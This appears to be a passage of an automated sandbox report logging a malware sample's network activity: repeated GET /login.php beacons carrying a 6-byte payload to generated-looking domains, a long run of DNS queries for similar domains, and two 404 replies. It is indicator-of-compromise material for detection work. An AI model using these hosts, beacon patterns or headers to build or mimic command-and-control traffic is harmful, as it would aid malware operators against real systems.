Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comContent-Length: 6Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523\|8.46.123.33\|1724431636\|1724431636\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1\|8.46.123.33\|1724431658\|1724431658\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Cookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Cookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20240824-0248-365f-be38-e61788a8e181 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.comContent-Length: 6Cookie: btst=230ba644e827e5eb69b76dd744835699\|8.46.123.33\|1724431667\|1724431667\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.comContent-Length: 6Cookie: btst=61afe5b7d011093f87c495eec767f391\|8.46.123.33\|1724431669\|1724431669\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78\|8.46.123.33\|1724431671\|1724431621\|25\|2\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431672\|1724431621\|25\|2\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Cookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431671\|1724431621\|25\|2\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431672\|1724431621\|25\|2\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Source: global traffic	DNS traffic detected: DNS query: gatyfus.com
Source: global traffic	DNS traffic detected: DNS query: lyvyxor.com
Source: global traffic	DNS traffic detected: DNS query: vojyqem.com
Source: global traffic	DNS traffic detected: DNS query: qetyfuv.com
Source: global traffic	DNS traffic detected: DNS query: gahyqah.com
Source: global traffic	DNS traffic detected: DNS query: puvyxil.com
Source: global traffic	DNS traffic detected: DNS query: lyryfyd.com
Source: global traffic	DNS traffic detected: DNS query: vocyzit.com
Source: global traffic	DNS traffic detected: DNS query: qegyqaq.com
Source: global traffic	DNS traffic detected: DNS query: purydyv.com
Source: global traffic	DNS traffic detected: DNS query: gacyzuz.com
Source: global traffic	DNS traffic detected: DNS query: lygymoj.com
Source: global traffic	DNS traffic detected: DNS query: vowydef.com
Source: global traffic	DNS traffic detected: DNS query: qexylup.com
Source: global traffic	DNS traffic detected: DNS query: pufymoq.com
Source: global traffic	DNS traffic detected: DNS query: gaqydeb.com
Source: global traffic	DNS traffic detected: DNS query: vofymik.com
Source: global traffic	DNS traffic detected: DNS query: qeqysag.com
Source: global traffic	DNS traffic detected: DNS query: puzylyp.com
Source: global traffic	DNS traffic detected: DNS query: gadyniw.com
Source: global traffic	DNS traffic detected: DNS query: lymysan.com
Source: global traffic	DNS traffic detected: DNS query: volykyc.com
Source: global traffic	DNS traffic detected: DNS query: qedynul.com
Source: global traffic	DNS traffic detected: DNS query: pumypog.com
Source: global traffic	DNS traffic detected: DNS query: galykes.com
Source: global traffic	DNS traffic detected: DNS query: lysynur.com
Source: global traffic	DNS traffic detected: DNS query: qekykev.com
Source: global traffic	DNS traffic detected: DNS query: pupybul.com
Source: global traffic	DNS traffic detected: DNS query: ganypih.com
Source: global traffic	DNS traffic detected: DNS query: lykyjad.com
Source: global traffic	DNS traffic detected: DNS query: qebytiq.com
Source: global traffic	DNS traffic detected: DNS query: vopybyt.com
Source: global traffic	DNS traffic detected: DNS query: gatyvyz.com
Source: global traffic	DNS traffic detected: DNS query: pujyjav.com
Source: global traffic	DNS traffic detected: DNS query: lyvytuj.com
Source: global traffic	DNS traffic detected: DNS query: vojyjof.com
Source: global traffic	DNS traffic detected: DNS query: qetyvep.com
Source: global traffic	DNS traffic detected: DNS query: puvytuq.com
Source: global traffic	DNS traffic detected: DNS query: lyryvex.com
Source: global traffic	DNS traffic detected: DNS query: gahyhob.com
Source: global traffic	DNS traffic detected: DNS query: vocyruk.com
Source: global traffic	DNS traffic detected: DNS query: qegyhig.com
Source: global traffic	DNS traffic detected: DNS query: purycap.com
Source: global traffic	DNS traffic detected: DNS query: gacyryw.com
Source: global traffic	DNS traffic detected: DNS query: lygygin.com
Source: global traffic	DNS traffic detected: DNS query: vowycac.com
Source: global traffic	DNS traffic detected: DNS query: pufygug.com
Source: global traffic	DNS traffic detected: DNS query: qexyryl.com
Source: global traffic	DNS traffic detected: DNS query: lyxywer.com
Source: global traffic	DNS traffic detected: DNS query: gaqycos.com
Source: global traffic	DNS traffic detected: DNS query: gadyfuh.com
Source: global traffic	DNS traffic detected: DNS query: lymyxid.com
Source: global traffic	DNS traffic detected: DNS query: qedyfyq.com
Source: global traffic	DNS traffic detected: DNS query: galyqaz.com
Source: global traffic	DNS traffic detected: DNS query: lysyfyj.com
Source: global traffic	DNS traffic detected: DNS query: vonyzuf.com
Source: global traffic	DNS traffic detected: DNS query: vonypom.com
Source: global traffic	DNS traffic detected: DNS query: vofygum.com
Source: global traffic	DNS traffic detected: DNS query: qeqyxov.com
Source: global traffic	DNS traffic detected: DNS query: puzywel.com
Source: global traffic	DNS traffic detected: DNS query: volyqat.com
Source: global traffic	DNS traffic detected: DNS query: pumyxiv.com
Source: global traffic	DNS traffic detected: DNS query: qekyqop.com
Source: global traffic	DNS traffic detected: DNS query: lyxylux.com
Source: global traffic	DNS traffic detected: DNS query: www.gahyqah.com
Source: global traffic	DNS traffic detected: DNS query: ww3.galyqaz.com
Source: global traffic	DNS traffic detected: DNS query: pupydeq.com
Source: global traffic	DNS traffic detected: DNS query: ganyzub.com
Source: global traffic	DNS traffic detected: DNS query: lykymox.com
Source: global traffic	DNS traffic detected: DNS query: vopydek.com
Source: global traffic	DNS traffic detected: DNS query: qebylug.com
Source: global traffic	DNS traffic detected: DNS query: pujymip.com
Source: global traffic	DNS traffic detected: DNS query: gatydaw.com
Source: global traffic	DNS traffic detected: DNS query: lyvylyn.com
Source: global traffic	DNS traffic detected: DNS query: vojymic.com
Source: global traffic	DNS traffic detected: DNS query: qetysal.com
Source: global traffic	DNS traffic detected: DNS query: puvylyg.com
Source: global traffic	DNS traffic detected: DNS query: gahynus.com
Source: global traffic	DNS traffic detected: DNS query: lyrysor.com
Source: global traffic	DNS traffic detected: DNS query: vocykem.com
Source: global traffic	DNS traffic detected: DNS query: qegynuv.com
Source: global traffic	DNS traffic detected: DNS query: purypol.com
Source: global traffic	DNS traffic detected: DNS query: gacykeh.com
Source: global traffic	DNS traffic detected: DNS query: lygynud.com
Source: global traffic	DNS traffic detected: DNS query: vowypit.com
Source: global traffic	DNS traffic detected: DNS query: qexykaq.com
Source: global traffic	DNS traffic detected: DNS query: pufybyv.com
Source: global traffic	DNS traffic detected: DNS query: gaqypiz.com
Source: global traffic	DNS traffic detected: DNS query: lyxyjaj.com
Source: global traffic	DNS traffic detected: DNS query: vofybyf.com
Source: global traffic	DNS traffic detected: DNS query: qeqytup.com
Source: global traffic	DNS traffic detected: DNS query: puzyjoq.com
Source: global traffic	DNS traffic detected: DNS query: gadyveb.com
Source: global traffic	DNS traffic detected: DNS query: lymytux.com
Source: global traffic	DNS traffic detected: DNS query: volyjok.com
Source: global traffic	DNS traffic detected: DNS query: qedyveg.com
Source: global traffic	DNS traffic detected: DNS query: galyhiw.com
Source: global traffic	DNS traffic detected: DNS query: lysyvan.com
Source: global traffic	DNS traffic detected: DNS query: qekyhil.com
Source: global traffic	DNS traffic detected: DNS query: vonyryc.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:47:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9W2LPnI%2FmslKKxs3EOeWkxA5EJ5Ee0hsx49puHp4udNgQWXUwT4jBNZ26XWZRal3IhTXEMZExz0v2z0uFjm8vzKIYnCviToMj1rvtVV5ZwNFRn%2FSe8%2FMkoOh5f%2BDTA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c9506ab12c326-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 16:47:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2FiBHz1heGVZxchx3O08cZeZiPF8xkUf9Kj6hBDnm0aimNVpIWumT5JEOU0Ap93qO6Nd%2FeVLYEwIKkbbx2TAHKhOiukZG6X0ir15M3I%2Fu6xI4rF2CEHDkzVAXPXZNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b7c95161e647d0c-EWRalt-svc: h3=":443"; ma=86400
